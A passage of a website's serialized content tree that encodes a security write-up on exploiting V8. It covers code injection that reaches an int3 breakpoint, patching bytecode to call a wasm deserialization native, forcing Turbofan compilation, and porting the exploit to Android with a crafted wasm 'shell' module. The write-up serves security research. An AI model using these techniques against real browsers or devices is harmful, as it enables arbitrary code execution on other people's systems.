,{"type":32,"value":1817},{"type":26,"tag":137,"props":138407,"children":138408},{"style":5601},[138409],{"type":32,"value":1108},{"type":26,"tag":137,"props":138411,"children":138412},{"style":5626},[138413],{"type":32,"value":1817},{"type":26,"tag":137,"props":138415,"children":138416},{"style":5601},[138417],{"type":32,"value":1108},{"type":26,"tag":137,"props":138419,"children":138420},{"style":5626},[138421],{"type":32,"value":1817},{"type":26,"tag":137,"props":138423,"children":138424},{"style":5601},[138425],{"type":32,"value":1108},{"type":26,"tag":137,"props":138427,"children":138428},{"style":5626},[138429],{"type":32,"value":1817},{"type":26,"tag":137,"props":138431,"children":138432},{"style":5601},[138433],{"type":32,"value":1108},{"type":26,"tag":137,"props":138435,"children":138436},{"style":5626},[138437],{"type":32,"value":1817},{"type":26,"tag":137,"props":138439,"children":138440},{"style":5601},[138441],{"type":32,"value":1108},{"type":26,"tag":137,"props":138443,"children":138444},{"style":5626},[138445],{"type":32,"value":1817},{"type":26,"tag":137,"props":138447,"children":138448},{"style":5601},[138449],{"type":32,"value":1108},{"type":26,"tag":137,"props":138451,"children":138452},{"style":5626},[138453],{"type":32,"value":1817},{"type":26,"tag":137,"props":138455,"children":138456},{"style":5601},[138457],{"type":32,"value":1108},{"type":26,"tag":137,"props":138459,"children":138460},{"style":5626},[138461],{"type":32,"value":1817},{"type":26,"tag":137,"props":138463,"children":138464},{"style":5601},[138465],{"type":32,"value":1108},{"type":26,"tag":137,"props":138467,"children":138468},{"style":5626},[138469],{"type":32,"value":1817},{"type":26,"tag":137,"props":138471,"children":138472},{"style":5601},[138473],{"type":32,"value":1108},{"type":26,"tag":137,"props":138475,"children":138476},{"style":5626},[138477],{"type":32,"value":3957},{"type":26,"tag":137,"props":138479,"children":138480},{"style":5601},[138481],{"type":32,"value":1108},{"type":26,"tag":137,"props":138483,"children":138484},{"style":5626},[138485],{"type":32,"value":138038},{"type":26,"tag":137,"props":138487,"children":138488},{"style":5601},[138489],{"type":32,"value":1108},{"type":26,"tag":137,"props":138491,"children":138492},{"style":5626},[138493],{"type":32,"value":138494},"198",{"type":26,"tag":137,"props":138496,"children":138497},{"style":5601},[138498],{"type":32,"value":1108},{"type":26,"tag":137,"props":138500,"children":138501},{"style":5626},[138502],{"type":32,"value":1817},{"type":26,"tag":137,"props":138504,"children":138505},{"style":5601},[138506],{"type":32,"value":6099},{"type":26,"tag":137,"props":138508,"children":138509},{"class":5559,"line":6208},[138510],{"type":26,"tag":137,"props":138511,"children":138512},{"style":5601},[138513],{"type":32,"value":137072},{"type":26,"tag":137,"props":138515,"children":138516},{"class":5559,"line":6225},[138517,138521,138526,138530,138535,138539,138543,138547,138551,138555,138559],{"type":26,"tag":137,"props":138518,"children":138519},{"style":5573},[138520],{"type":32,"value":10440},{"type":26,"tag":137,"props":138522,"children":138523},{"style":5584},[138524],{"type":32,"value":138525}," r",{"type":26,"tag":137,"props":138527,"children":138528},{"style":5590},[138529],{"type":32,"value":5593},{"type":26,"tag":137,"props":138531,"children":138532},{"style":5682},[138533],{"type":32,"value":138534}," bug",{"type":26,"tag":137,"props":138536,"children":138537},{"style":5601},[138538],{"type":32,"value":165},{"type":26,"tag":137,"props":138540,"children":138541},{"style":5584},[138542],{"type":32,"value":136403},{"type":26,"tag":137,"props":138544,"children":138545},{"style":5601},[138546],{"type":32,"value":1108},{"type":26,"tag":137,"props":138548,"children":138549},{"style":5584},[138550],{"type":32,"value":127693},{"type":26,"tag":137,"props":138552,"children":138553},{"style":5601},[138554],{"type":32,"value":470},{"type":26,"tag":137,"props":138556,"children":138557},{"style":5584},[138558],{"type":32,"value":127693},{"type":26,"tag":137,"props":138560,"children":138561},{"style":5601},[138562],{"type":32,"value":6430},{"type":26,"tag":137,"props":138564,"children":138565},{"class":5559,"line":6238},[138566,138571,138575,138579,138583,138587,138591,138595,138600,138604],{"type":26,"tag":137,"props":138567,"children":138568},{"style":5584},[138569],{"type":32,"value":138570},"  result",{"type":26,"tag":137,"props":138572,"children":138573},{"style":5590},[138574],{"type":32,"value":5593},{"type":26,"tag":137,"props":138576,"children":138577},{"style":5601},[138578],{"type":32,"value":4625},{"type":26,"tag":137,"props":138580,"children":138581},{"style":5610},[138582],{"type":32,"value":35512},{"type":26,"tag":137,"props":138584,"children":138585},{"style":5584},[138586],{"type":32,"value":138525},{"type":26,"tag":137,"props":138588,"children":138589},{"style":5601},[138590],{"type":32,"value":470},{"type":26,"tag":137,"props":138592,"children":138593},{"style":5682},[138594],{"type":32,"value":60166},{"type":26,"tag":137,"props":138596,"children":138597},{"style":5601},[138598],{"type":32,"value":138599},"()).",{"type":26,"tag":137,"props":138601,"children":138602},{"style":5584},[138603],{"type":32,"value":41748},{"type":26,"tag":137,"props":138605,"children":138606},{"style":5601},[138607],{"type":32,"value":5604},{"type":26,"tag":137,"props":138609,"children":138610},{"class":5559,"line":6247},[138611,138615,138620,138624,138628,138632,138636,138640,138644,138648],{"type":26,"tag":137,"props":138612,"children":138613},{"style":5573},[138614],{"type":32,"value":38784},{"type":26,"tag":137,"props":138616,"children":138617},{"style":5584},[138618],{"type":32,"value":138619}," wasm_instance",{"type":26,"tag":137,"props":138621,"children":138622},{"style":5590},[138623],{"type":32,"value":5593},{"type":26,"tag":137,"props":138625,"children":138626},{"style":5573},[138627],{"type":32,"value":34528},{"type":26,"tag":137,"props":138629,"children":138630},{"style":5584},[138631],{"type":32,"value":136386},{"type":26,"tag":137,"props":138633,"children":138634},{"style":5601},[138635],{"type":32,"value":470},{"type":26,"tag":137,"props":138637,"children":138638},{"style":5682},[138639],{"type":32,"value":136440},{"type":26,"tag":137,"props":138641,"children":138642},{"style":5601},[138643],{"type":32,"value":165},{"type":26,"tag":137,"props":138645,"children":138646},{"style":5584},[138647],{"type":32,"value":11670},{"type":26,"tag":137,"props":138649,"children":138650},{"style":5601},[138651],{"type":32,"value":6430},{"type":26,"tag":137,"props":138653,"children":138654},{"class":5559,"line":6270},[138655,138659,138663,138667,138671,138675,138679,138683,138687],{"type":26,"tag":137,"props":138656,"children":138657},{"style":5573},[138658],{"type":32,"value":38784},{"type":26,"tag":137,"props":138660,"children":138661},{"style":5584},[138662],{"type":32,"value":35567},{"type":26,"tag":137,"props":138664,"children":138665},{"style":5590},[138666],{"type":32,"value":5593},{"type":26,"tag":137,"props":138668,"children":138669},{"style":5584},[138670],{"type":32,"value":138619},{"type":26,"tag":137,"props":138672,"children":138673},{"style":5601},[138674],{"type":32,"value":470},{"type":26,"tag":137,"props":138676,"children":138677},{"style":5584},[138678],{"type":32,"value":40482},{"type":26,"tag":137,"props":138680,"children":138681},{"style":5601},[138682],{"type":32,"value":470},{"type":26,"tag":137,"props":138684,"children":138685},{"style":5584},[138686],{"type":32,"value":136489},{"type":26,"tag":137,"props":138688,"children":138689},{"style":5601},[138690],{"type":32,"value":5604},{"type":26,"tag":137,"props":138692,"children":138693},{"class":5559,"line":6279},[138694,138699],{"type":26,"tag":137,"props":138695,"children":138696},{"style":5682},[138697],{"type":32,"value":138698},"  f",{"type":26,"tag":137,"props":138700,"children":138701},{"style":5601},[138702],{"type":32,"value":6267},{"type":26,"tag":137,"props":138704,"children":138705},{"class":5559,"line":6288},[138706],{"type":26,"tag":137,"props":138707,"children":138708},{"style":5601},[138709],{"type":32,"value":104566},{"type":26,"tag":35,"props":138711,"children":138712},{},[138713],{"type":32,"value":138714},"Running this in a debugger shows the expected breakpoint:",{"type":26,"tag":5512,"props":138716,"children":138718},{"code":138717},"Thread 1 \"d8\" received signal SIGTRAP, Trace/breakpoint trap.\n0x00002ae46bfc1841 in ?? ()\n────────────────────────────────────────────────────────────────────────────\n   0x2ae46bfc183c                  add    BYTE PTR [rax], al\n   0x2ae46bfc183e                  add    BYTE PTR [rax], al\n   0x2ae46bfc1840                  int3\n → 0x2ae46bfc1841                  mov    rbp, rsp\n",[138719],{"type":26,"tag":130,"props":138720,"children":138721},{"__ignoreMap":7},[138722],{"type":32,"value":138717},{"type":26,"tag":118,"props":138724,"children":138726},{"id":138725},"porting-to-android",[138727],{"type":32,"value":138728},"Porting to Android",{"type":26,"tag":35,"props":138730,"children":138731},{},[138732,138734,138739,138741,138746,138748,138753,138755,138761],{"type":32,"value":138733},"The serialized x86-64 code can’t be used on the device because the architecture differs, and ",{"type":26,"tag":130,"props":138735,"children":138737},{"className":138736},[],[138738],{"type":32,"value":135518},{"type":32,"value":138740}," fails. We cross-compiled ",{"type":26,"tag":130,"props":138742,"children":138744},{"className":138743},[],[138745],{"type":32,"value":134677},{"type":32,"value":138747}," for arm64 and serialized the module there, but this still didn’t work on the device and ",{"type":26,"tag":130,"props":138749,"children":138751},{"className":138750},[],[138752],{"type":32,"value":135518},{"type":32,"value":138754}," returned ",{"type":26,"tag":130,"props":138756,"children":138758},{"className":138757},[],[138759],{"type":32,"value":138760},"undefined",{"type":32,"value":470},{"type":26,"tag":35,"props":138763,"children":138764},{},[138765,138767,138772,138774,138779],{"type":32,"value":138766},"Instead, we modified the bytecode to call ",{"type":26,"tag":130,"props":138768,"children":138770},{"className":138769},[],[138771],{"type":32,"value":135544},{"type":32,"value":138773}," directly on the device. The idea is to serialize the code on the device and then feed the resulting bytes back into the original bytecode that calls ",{"type":26,"tag":130,"props":138775,"children":138777},{"className":138776},[],[138778],{"type":32,"value":135518},{"type":32,"value":470},{"type":26,"tag":5512,"props":138781,"children":138783},{"code":138782,"language":38211,"meta":7,"className":38209,"style":7},"try {\n  ${'a1 + 0xa931111;'.repeat(0x059301 - 1)}\n  a1 + 0x03027a6c;\n  throw 0x393e71a;\n} catch (e) {\n  console.log(\"foo\");\n  yield a16;\n}\n",[138784],{"type":26,"tag":130,"props":138785,"children":138786},{"__ignoreMap":7},[138787,138798,138842,138862,138878,138901,138928,138943],{"type":26,"tag":137,"props":138788,"children":138789},{"class":5559,"line":5560},[138790,138794],{"type":26,"tag":137,"props":138791,"children":138792},{"style":5610},[138793],{"type":32,"value":50933},{"type":26,"tag":137,"props":138795,"children":138796},{"style":5601},[138797],{"type":32,"value":5875},{"type":26,"tag":137,"props":138799,"children":138800},{"class":5559,"line":5412},[138801,138805,138809,138813,138817,138821,138825,138830,138834,138838],{"type":26,"tag":137,"props":138802,"children":138803},{"style":5584},[138804],{"type":32,"value":135785},{"type":26,"tag":137,"props":138806,"children":138807},{"style":5601},[138808],{"type":32,"value":79221},{"type":26,"tag":137,"props":138810,"children":138811},{"style":6837},[138812],{"type":32,"value":135794},{"type":26,"tag":137,"props":138814,"children":138815},{"style":5601},[138816],{"type":32,"value":470},{"type":26,"tag":137,"props":138818,"children":138819},{"style":5682},[138820],{"type":32,"value":135803},{"type":26,"tag":137,"props":138822,"children":138823},{"style":5601},[138824],{"type":32,"value":165},{"type":26,"tag":137,"props":138826,"children":138827},{"style":5626},[138828],{"type":32,"value":138829},"0x059301",{"type":26,"tag":137,"props":138831,"children":138832},{"style":5590},[138833],{"type":32,"value":53858},{"type":26,"tag":137,"props":138835,"children":138836},{"style":5626},[138837],{"type":32,"value":7104},{"type":26,"tag":137,"props":138839,"children":138840},{"style":5601},[138841],{"type":32,"value":135825},{"type":26,"tag":137,"props":138843,"children":138844},{"class":5559,"line":5417},[138845,138849,138853,138858],{"type":26,"tag":137,"props":138846,"children":138847},{"style":5584},[138848],{"type":32,"value":135833},{"type":26,"tag":137,"props":138850,"children":138851},{"style":5590},[138852],{"type":32,"value":11491},{"type":26,"tag":137,"props":138854,"children":138855},{"style":5626},[138856],{"type":32,"value":138857}," 0x03027a6c",{"type":26,"tag":137,"props":138859,"children":138860},{"style":5601},[138861],{"type":32,"value":5604},{"type":26,"tag":137,"props":138863,"children":138864},{"class":5559,"line":5642},[138865,138869,138874],{"type":26,"tag":137,"props":138866,"children":138867},{"style":5610},[138868],{"type":32,"value":37798},{"type":26,"tag":137,"props":138870,"children":138871},{"style":5626},[138872],{"type":32,"value":138873}," 0x393e71a",{"type":26,"tag":137,"props":138875,"children":138876},{"style":5601},[138877],{"type":32,"value":5604},{"type":26,"tag":137,"props":138879,"children":138880},{"class":5559,"line":5745},[138881,138885,138889,138893,138897],{"type":26,"tag":137,"props":138882,"children":138883},{"style":5601},[138884],{"type":32,"value":49476},{"type":26,"tag":137,"props":138886,"children":138887},{"style":5610},[138888],{"type":32,"value":51013},{"type":26,"tag":137,"props":138890,"children":138891},{"style":5601},[138892],{"type":32,"value":4625},{"type":26,"tag":137,"props":138894,"children":138895},{"style":5584},[138896],{"type":32,"value":54057},{"type":26,"tag":137,"props":138898,"children":138899},{"style":5601},[138900],{"type":32,"value":17395},{"type":26,"tag":137,"props":138902,"children":138903},{"class":5559,"line":5850},[138904,138908,138912,138916,138920,138924],{"type":26,"tag":137,"props":138905,"children":138906},{"style":5584},[138907],{"type":32,"value":104525},{"type":26,"tag":137,"props":138909,"children":138910},{"style":5601},[138911],{"type":32,"value":470},{"type":26,"tag":137,"props":138913,"children":138914},{"style":5682},[138915],{"type":32,"value":104534},{"type":26,"tag":137,"props":138917,"children":138918},{"style":5601},[138919],{"type":32,"value":165},{"type":26,"tag":137,"props":138921,"children":138922},{"style":6837},[138923],{"type":32,"value":135909},{"type":26,"tag":137,"props":138925,"children":138926},{"style":5601},[138927],{"type":32,"value":6430},{"type":26,"tag":137,"props":138929,"children":138930},{"class":5559,"line":5878},[138931,138935,138939],{"type":26,"tag":137,"props":138932,"children":138933},{"style":5610},[138934],{"type":32,"value":135921},{"type":26,"tag":137,"props":138936,"children":138937},{"style":5584},[138938],{"type":32,"value":135926},{"type":26,"tag":137,"props":138940,"children":138941},{"style":5601},[138942],{"type":32,"value":5604},{"type":26,"tag":137,"props":138944,"children":138945},{"class":5559,"line":5891},[138946],{"type":26,"tag":137,"props":138947,"children":138948},{"style":5601},[138949],{"type":32,"value":6507},{"type":26,"tag":35,"props":138951,"children":138952},{},[138953,138955,138961,138963,138969,138971,138977,138979,138984,138986,138992,138994,138999,139000,139006],{"type":32,"value":138954},"Here, ",{"type":26,"tag":130,"props":138956,"children":138958},{"className":138957},[],[138959],{"type":32,"value":138960},"a1 + 0x03027a6c",{"type":32,"value":138962}," generates the bytes ",{"type":26,"tag":130,"props":138964,"children":138966},{"className":138965},[],[138967],{"type":32,"value":138968},"01 4b 6c 7a 02 03",{"type":32,"value":138970},", where ",{"type":26,"tag":130,"props":138972,"children":138974},{"className":138973},[],[138975],{"type":32,"value":138976},"0x6c",{"type":32,"value":138978}," is the ",{"type":26,"tag":130,"props":138980,"children":138982},{"className":138981},[],[138983],{"type":32,"value":135502},{"type":32,"value":138985}," opcode, ",{"type":26,"tag":130,"props":138987,"children":138989},{"className":138988},[],[138990],{"type":32,"value":138991},"0x027a",{"type":32,"value":138993}," is the function ID of ",{"type":26,"tag":130,"props":138995,"children":138997},{"className":138996},[],[138998],{"type":32,"value":135544},{"type":32,"value":3525},{"type":26,"tag":130,"props":139001,"children":139003},{"className":139002},[],[139004],{"type":32,"value":139005},"0x03",{"type":32,"value":139007}," is the register index holding its first argument.",{"type":26,"tag":35,"props":139009,"children":139010},{},[139011,139013,139018,139019,139024,139026,139031],{"type":32,"value":139012},"Our earlier javascript snippet that serialized the wasm module used two native calls: ",{"type":26,"tag":130,"props":139014,"children":139016},{"className":139015},[],[139017],{"type":32,"value":135544},{"type":32,"value":3339},{"type":26,"tag":130,"props":139020,"children":139022},{"className":139021},[],[139023],{"type":32,"value":136512},{"type":32,"value":139025},". To avoid patching the bytecode again to invoke ",{"type":26,"tag":130,"props":139027,"children":139029},{"className":139028},[],[139030],{"type":32,"value":136512},{"type":32,"value":139032},", we can force Turbofan to compile the target function like this:",{"type":26,"tag":5512,"props":139034,"children":139036},{"code":139035,"language":38211,"meta":7,"className":38209,"style":7},"// %WasmTierUpFunction(func);\nfor (let i = 0; i \u003C 0x100000; i++) {\n  func();\n}\n",[139037],{"type":26,"tag":130,"props":139038,"children":139039},{"__ignoreMap":7},[139040,139048,139108,139120],{"type":26,"tag":137,"props":139041,"children":139042},{"class":5559,"line":5560},[139043],{"type":26,"tag":137,"props":139044,"children":139045},{"style":5564},[139046],{"type":32,"value":139047},"// %WasmTierUpFunction(func);\n",{"type":26,"tag":137,"props":139049,"children":139050},{"class":5559,"line":5412},[139051,139055,139059,139063,139067,139071,139075,139079,139083,139087,139092,139096,139100,139104],{"type":26,"tag":137,"props":139052,"children":139053},{"style":5610},[139054],{"type":32,"value":5983},{"type":26,"tag":137,"props":139056,"children":139057},{"style":5601},[139058],{"type":32,"value":4625},{"type":26,"tag":137,"props":139060,"children":139061},{"style":5573},[139062],{"type":32,"value":14378},{"type":26,"tag":137,"props":139064,"children":139065},{"style":5584},[139066],{"type":32,"value":5988},{"type":26,"tag":137,"props":139068,"children":139069},{"style":5590},[139070],{"type":32,"value":5593},{"type":26,"tag":137,"props":139072,"children":139073},{"style":5626},[139074],{"type":32,"value":5629},{"type":26,"tag":137,"props":139076,"children":139077},{"style":5601},[139078],{"type":32,"value":19820},{"type":26,"tag":137,"props":139080,"children":139081},{"style":5584},[139082],{"type":32,"value":506},{"type":26,"tag":137,"props":139084,"children":139085},{"style":5590},[139086],{"type":32,"value":11305},{"type":26,"tag":137,"props":139088,"children":139089},{"style":5626},[139090],{"type":32,"value":139091}," 0x100000",{"type":26,"tag":137,"props":139093,"children":139094},{"style":5601},[139095],{"type":32,"value":19820},{"type":26,"tag":137,"props":139097,"children":139098},{"style":5584},[139099],{"type":32,"value":506},{"type":26,"tag":137,"props":139101,"children":139102},{"style":5590},[139103],{"type":32,"value":53872},{"type":26,"tag":137,"props":139105,"children":139106},{"style":5601},[139107],{"type":32,"value":17395},{"type":26,"tag":137,"props":139109,"children":139110},{"class":5559,"line":5417},[139111,139116],{"type":26,"tag":137,"props":139112,"children":139113},{"style":5682},[139114],{"type":32,"value":139115},"  func",{"type":26,"tag":137,"props":139117,"children":139118},{"style":5601},[139119],{"type":32,"value":6267},{"type":26,"tag":137,"props":139121,"children":139122},{"class":5559,"line":5642},[139123],{"type":26,"tag":137,"props":139124,"children":139125},{"style":5601},[139126],{"type":32,"value":6507},{"type":26,"tag":35,"props":139128,"children":139129},{},[139130],{"type":32,"value":139131},"Finally, running this code on the device:",{"type":26,"tag":5512,"props":139133,"children":139135},{"code":139134,"language":38211,"meta":7,"className":38209,"style":7},"(async () => {\n  var wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  var mod = new WebAssembly.Module(wasm_code);\n  var inst = new WebAssembly.Instance(mod);\n  var func = inst.exports.shell;\n\n  // %WasmTierUpFunction(func);\n  for (let i = 0; i \u003C 0x100000; i++) {\n    func();\n  }\n\n  let r = bug(mod);\n  result = (await r.next()).value;\n  console.log(result);\n\n  let result_bytes = new Uint8Array(result);\n  console.log('[' + result_bytes.join(', ') + ']');\n})();\n",[139136],{"type":26,"tag":130,"props":139137,"children":139138},{"__ignoreMap":7},[139139,139162,139190,139409,139476,139483,139526,139569,139608,139615,139623,139683,139695,139702,139709,139740,139783,139810,139817,139853,139916],{"type":26,"tag":137,"props":139140,"children":139141},{"class":5559,"line":5560},[139142,139146,139150,139154,139158],{"type":26,"tag":137,"props":139143,"children":139144},{"style":5601},[139145],{"type":32,"value":165},{"type":26,"tag":137,"props":139147,"children":139148},{"style":5573},[139149],{"type":32,"value":38741},{"type":26,"tag":137,"props":139151,"children":139152},{"style":5601},[139153],{"type":32,"value":42293},{"type":26,"tag":137,"props":139155,"children":139156},{"style":5573},[139157],{"type":32,"value":17413},{"type":26,"tag":137,"props":139159,"children":139160},{"style":5601},[139161],{"type":32,"value":5875},{"type":26,"tag":137,"props":139163,"children":139164},{"class":5559,"line":5412},[139165,139170,139174,139178,139182,139186],{"type":26,"tag":137,"props":139166,"children":139167},{"style":5573},[139168],{"type":32,"value":139169},"  var",{"type":26,"tag":137,"props":139171,"children":139172},{"style":5584},[139173],{"type":32,"value":136042},{"type":26,"tag":137,"props":139175,"children":139176},{"style":5590},[139177],{"type":32,"value":5593},{"type":26,"tag":137,"props":139179,"children":139180},{"style":5573},[139181],{"type":32,"value":34528},{"type":26,"tag":137,"props":139183,"children":139184},{"style":5682},[139185],{"type":32,"value":136055},{"type":26,"tag":137,"props":139187,"children":139188},{"style":5601},[139189],{"type":32,"value":136060},{"type":26,"tag":137,"props":139191,"children":139192},{"class":5559,"line":5417},[139193,139197,139201,139205,139209,139213,139217,139221,139225,139229,139233,139237,139241,139245,139249,139253,139257,139261,139265,139269,139273,139277,139281,139285,139289,139293,139297,139301,139305,139309,139313,139317,139321,139325,139329,139333,139337,139341,139345,139349,139353,139357,139361,139365,139369,139373,139377,139381,139385,139389,139393,139397,139401,139405],{"type":26,"tag":137,"props":139194,"children":139195},{"style":5626},[139196],{"type":32,"value":136785},{"type":26,"tag":137,"props":139198,"children":139199},{"style":5601},[139200],{"type":32,"value":1108},{"type":26,"tag":137,"props":139202,"children":139203},{"style":5626},[139204],{"type":32,"value":136077},{"type":26,"tag":137,"props":139206,"children":139207},{"style":5601},[139208],{"type":32,"value":1108},{"type":26,"tag":137,"props":139210,"children":139211},{"style":5626},[139212],{"type":32,"value":136086},{"type":26,"tag":137,"props":139214,"children":139215},{"style":5601},[139216],{"type":32,"value":1108},{"type":26,"tag":137,"props":139218,"children":139219},{"style":5626},[139220],{"type":32,"value":136095},{"type":26,"tag":137,"props":139222,"children":139223},{"style":5601},[139224],{"type":32,"value":1108},{"type":26,"tag":137,"props":139226,"children":139227},{"style":5626},[139228],{"type":32,"value":878},{"type":26,"tag":137,"props":139230,"children":139231},{"style":5601},[139232],{"type":32,"value":1108},{"type":26,"tag":137,"props":139234,"children":139235},{"style":5626},[139236],{"type":32,"value":1817},{"type":26,"tag":137,"props":139238,"children":139239},{"style":5601},[139240],{"type":32,"value":1108},{"type":26,"tag":137,"props":139242,"children":139243},{"style":5626},[139244],{"type":32,"value":1817},{"type":26,"tag":137,"props":139246,"children":139247},{"style":5601},[139248],{"type":32,"value":1108},{"type":26,"tag":137,"props":139250,"children":139251},{"style":5626},[139252],{"type":32,"value":1817},{"type":26,"tag":137,"props":139254,"children":139255},{"style":5601},[139256],{"type":32,"value":1108},{"type":26,"tag":137,"props":139258,"children":139259},{"style":5626},[139260],{"type":32,"value":878},{"type":26,"tag":137,"props":139262,"children":139263},{"style":5601},[139264],{"type":32,"value":1108},{"type":26,"tag":137,"props":139266,"children":139267},{"style":5626},[139268],{"type":32,"value":3235},{"type":26,"tag":137,"props":139270,"children":139271},{"style":5601},[139272],{"type":32,"value":1108},{"type":26,"tag":137,"props":139274,"children":139275},{"style":5626},[139276],{"type":32,"value":878},{"type":26,"tag":137,"props":139278,"children":139279},{"style":5601},[139280],{"type":32,"value":1108},{"type":26,"tag":137,"props":139282,"children":139283},{"style":5626},[139284],{"type":32,"value":136160},{"type":26,"tag":137,"props":139286,"children":139287},{"style":5601},[139288],{"type":32,"value":1108},{"type":26,"tag":137,"props":139290,"children":139291},{"style":5626},[139292],{"type":32,"value":1817},{"type":26,"tag":137,"props":139294,"children":139295},{"style":5601},[139296],{"type":32,"value":1108},{"type":26,"tag":137,"props":139298,"children":139299},{"style":5626},[139300],{"type":32,"value":1817},{"type":26,"tag":137,"props":139302,"children":139303},{"style":5601},[139304],{"type":32,"value":1108},{"type":26,"tag":137,"props":139306,"children":139307},{"style":5626},[139308],{"type":32,"value":344},{"type":26,"tag":137,"props":139310,"children":139311},{"style":5601},[139312],{"type":32,"value":1108},{"type":26,"tag":137,"props":139314,"children":139315},{"style":5626},[139316],{"type":32,"value":277},{"type":26,"tag":137,"props":139318,"children":139319},{"style":5601},[139320],{"type":32,"value":1108},{"type":26,"tag":137,"props":139322,"children":139323},{"style":5626},[139324],{"type":32,"value":878},{"type":26,"tag":137,"props":139326,"children":139327},{"style":5601},[139328],{"type":32,"value":1108},{"type":26,"tag":137,"props":139330,"children":139331},{"style":5626},[139332],{"type":32,"value":1817},{"type":26,"tag":137,"props":139334,"children":139335},{"style":5601},[139336],{"type":32,"value":1108},{"type":26,"tag":137,"props":139338,"children":139339},{"style":5626},[139340],{"type":32,"value":375},{"type":26,"tag":137,"props":139342,"children":139343},{"style":5601},[139344],{"type":32,"value":1108},{"type":26,"tag":137,"props":139346,"children":139347},{"style":5626},[139348],{"type":32,"value":58487},{"type":26,"tag":137,"props":139350,"children":139351},{"style":5601},[139352],{"type":32,"value":1108},{"type":26,"tag":137,"props":139354,"children":139355},{"style":5626},[139356],{"type":32,"value":878},{"type":26,"tag":137,"props":139358,"children":139359},{"style":5601},[139360],{"type":32,"value":1108},{"type":26,"tag":137,"props":139362,"children":139363},{"style":5626},[139364],{"type":32,"value":20701},{"type":26,"tag":137,"props":139366,"children":139367},{"style":5601},[139368],{"type":32,"value":1108},{"type":26,"tag":137,"props":139370,"children":139371},{"style":5626},[139372],{"type":32,"value":136086},{"type":26,"tag":137,"props":139374,"children":139375},{"style":5601},[139376],{"type":32,"value":1108},{"type":26,"tag":137,"props":139378,"children":139379},{"style":5626},[139380],{"type":32,"value":136257},{"type":26,"tag":137,"props":139382,"children":139383},{"style":5601},[139384],{"type":32,"value":1108},{"type":26,"tag":137,"props":139386,"children":139387},{"style":5626},[139388],{"type":32,"value":136266},{"type":26,"tag":137,"props":139390,"children":139391},{"style":5601},[139392],{"type":32,"value":1108},{"type":26,"tag":137,"props":139394,"children":139395},{"style":5626},[139396],{"type":32,"value":136275},{"type":26,"tag":137,"props":139398,"children":139399},{"style":5601},[139400],{"type":32,"value":1108},{"type":26,"tag":137,"props":139402,"children":139403},{"style":5626},[139404],{"type":32,"value":136275},{"type":26,"tag":137,"props":139406,"children":139407},{"style":5601},[139408],{"type":32,"value":6099},{"type":26,"tag":137,"props":139410,"children":139411},{"class":5559,"line":5642},[139412,139416,139420,139424,139428,139432,139436,139440,139444,139448,139452,139456,139460,139464,139468,139472],{"type":26,"tag":137,"props":139413,"children":139414},{"style":5626},[139415],{"type":32,"value":136785},{"type":26,"tag":137,"props":139417,"children":139418},{"style":5601},[139419],{"type":32,"value":1108},{"type":26,"tag":137,"props":139421,"children":139422},{"style":5626},[139423],{"type":32,"value":1817},{"type":26,"tag":137,"props":139425,"children":139426},{"style":5601},[139427],{"type":32,"value":1108},{"type":26,"tag":137,"props":139429,"children":139430},{"style":5626},[139431],{"type":32,"value":91855},{"type":26,"tag":137,"props":139433,"children":139434},{"style":5601},[139435],{"type":32,"value":1108},{"type":26,"tag":137,"props":139437,"children":139438},{"style":5626},[139439],{"type":32,"value":3235},{"type":26,"tag":137,"props":139441,"children":139442},{"style":5601},[139443],{"type":32,"value":1108},{"type":26,"tag":137,"props":139445,"children":139446},{"style":5626},[139447],{"type":32,"value":878},{"type":26,"tag":137,"props":139449,"children":139450},{"style":5601},[139451],{"type":32,"value":1108},{"type":26,"tag":137,"props":139453,"children":139454},{"style":5626},[139455],{"type":32,"value":277},{"type":26,"tag":137,"props":139457,"children":139458},{"style":5601},[139459],{"type":32,"value":1108},{"type":26,"tag":137,"props":139461,"children":139462},{"style":5626},[139463],{"type":32,"value":1817},{"type":26,"tag":137,"props":139465,"children":139466},{"style":5601},[139467],{"type":32,"value":1108},{"type":26,"tag":137,"props":139469,"children":139470},{"style":5626},[139471],{"type":32,"value":136351},{"type":26,"tag":137,"props":139473,"children":139474},{"style":5601},[139475],{"type":32,"value":6099},{"type":26,"tag":137,"props":139477,"children":139478},{"class":5559,"line":5745},[139479],{"type":26,"tag":137,"props":139480,"children":139481},{"style":5601},[139482],{"type":32,"value":137072},{"type":26,"tag":137,"props":139484,"children":139485},{"class":5559,"line":5850},[139486,139490,139494,139498,139502,139506,139510,139514,139518,139522],{"type":26,"tag":137,"props":139487,"children":139488},{"style":5573},[139489],{"type":32,"value":139169},{"type":26,"tag":137,"props":139491,"children":139492},{"style":5584},[139493],{"type":32,"value":74225},{"type":26,"tag":137,"props":139495,"children":139496},{"style":5590},[139497],{"type":32,"value":5593},{"type":26,"tag":137,"props":139499,"children":139500},{"style":5573},[139501],{"type":32,"value":34528},{"type":26,"tag":137,"props":139503,"children":139504},{"style":5584},[139505],{"type":32,"value":136386},{"type":26,"tag":137,"props":139507,"children":139508},{"style":5601},[139509],{"type":32,"value":470},{"type":26,"tag":137,"props":139511,"children":139512},{"style":5682},[139513],{"type":32,"value":88521},{"type":26,"tag":137,"props":139515,"children":139516},{"style":5601},[139517],{"type":32,"value":165},{"type":26,"tag":137,"props":139519,"children":139520},{"style":5584},[139521],{"type":32,"value":136403},{"type":26,"tag":137,"props":139523,"children":139524},{"style":5601},[139525],{"type":32,"value":6430},{"type":26,"tag":137,"props":139527,"children":139528},{"class":5559,"line":5878},[139529,139533,139537,139541,139545,139549,139553,139557,139561,139565],{"type":26,"tag":137,"props":139530,"children":139531},{"style":5573},[139532],{"type":32,"value":139169},{"type":26,"tag":137,"props":139534,"children":139535},{"style":5584},[139536],{"type":32,"value":136419},{"type":26,"tag":137,"props":139538,"children":139539},{"style":5590},[139540],{"type":32,"value":5593},{"type":26,"tag":137,"props":139542,"children":139543},{"style":5573},[139544],{"type":32,"value":34528},{"type":26,"tag":137,"props":139546,"children":139547},{"style":5584},[139548],{"type":32,"value":136386},{"type":26,"tag":137,"props":139550,"children":139551},{"style":5601},[139552],{"type":32,"value":470},{"type":26,"tag":137,"props":139554,"children":139555},{"style":5682},[139556],{"type":32,"value":136440},{"type":26,"tag":137,"props":139558,"children":139559},{"style":5601},[139560],{"type":32,"value":165},{"type":26,"tag":137,"props":139562,"children":139563},{"style":5584},[139564],{"type":32,"value":136449},{"type":26,"tag":137,"props":139566,"children"